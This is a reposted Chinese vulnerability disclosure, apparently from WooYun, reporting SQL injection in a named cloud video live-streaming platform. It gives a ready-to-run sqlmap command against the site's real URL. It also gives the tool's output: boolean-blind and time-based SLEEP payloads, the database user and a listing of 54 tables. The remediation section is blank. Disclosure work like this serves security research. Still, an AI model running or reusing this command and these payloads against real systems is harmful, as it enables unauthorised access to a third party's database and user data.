神刀安全网

漏洞标题: 某云视频直播平台存在SQL注入漏洞

漏洞详情

披露状态:

2016-04-06: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

核心团队均来自腾讯等知名互联网企业,在互联网产品规划、云平台建设、流媒体技术领域经验丰富、建树颇多,在解决国内视频直播技术领域具有绝对的优势和前瞻性,被行业推崇为最具发展潜力的视频互动直播。

某云视频直播平台存在SQL注入漏洞

详细说明:

code 区域
python sqlmap.py -u "http://www.jingchang.tv/index.php?s=/Home/Index/new_show/id/21" --tables -D "cloud"

漏洞证明:

code 区域
sqlmap identified the following injection point(s) with a total of 102 HTTP(s) requests:
---
Parameter: s (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: s=/Home/Index/new_show/id/21) AND 8951=8951 AND (1886=1886

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: s=/Home/Index/new_show/id/21) AND (SELECT * FROM (SELECT(SLEEP(5)))XNqn) AND (3272=3272
---
back-end DBMS: MySQL 5.0.12
current database: 'cloud'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: s (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: s=/Home/Index/new_show/id/21) AND 8951=8951 AND (1886=1886

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: s=/Home/Index/new_show/id/21) AND (SELECT * FROM (SELECT(SLEEP(5)))XNqn) AND (3272=3272
---
back-end DBMS: MySQL >= 5.0.0
current user: '[email protected]'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: s (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: s=/Home/Index/new_show/id/21) AND 8951=8951 AND (1886=1886

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: s=/Home/Index/new_show/id/21) AND (SELECT * FROM (SELECT(SLEEP(5)))XNqn) AND (3272=3272
---
back-end DBMS: MySQL 5
Database: cloud
[54 tables]
+-----------------------+
| jck_action |
| jck_action_log |
| jck_addons |
| jck_api_group |
| jck_api_record |
| jck_apidoc_log |
| jck_apidoc_main |
| jck_apidoc_params |
| jck_apidoc_return |
| jck_attachment |
| jck_attribute |
| jck_auth_extend |
| jck_auth_group |
| jck_auth_group_access |
| jck_auth_rule |
| jck_camera_category |
| jck_camera_channel |
| jck_camera_group |
| jck_camera_main |
| jck_camera_session |
| jck_camera_type |
| jck_category |
| jck_channel |
| jck_company_banner |
| jck_company_category |
| jck_company_document |
| jck_company_menu |
| jck_config |
| jck_device_camera |
| jck_device_main |
| jck_document |
| jck_document_article |
| jck_document_download |
| jck_file |
| jck_general_count |
| jck_general_nations |
| jck_general_provinces |
| jck_hooks |
| jck_menu |
| jck_model |
| jck_picture |
| jck_social_action |
| jck_social_discuz |
| jck_social_friends |
| jck_social_related |
| jck_store_auth |
| jck_ucenter_admin |
| jck_ucenter_app |
| jck_ucenter_member |
| jck_ucenter_setting |
| jck_url |
| jck_user_article |
| jck_user_main |
| jck_userdata |
+-----------------------+

sqlmap resumed the following injection point(s) from stored session:

修复方案:

版权声明:转载请注明来源 绿箭侠@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 某云视频直播平台存在SQL注入漏洞

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址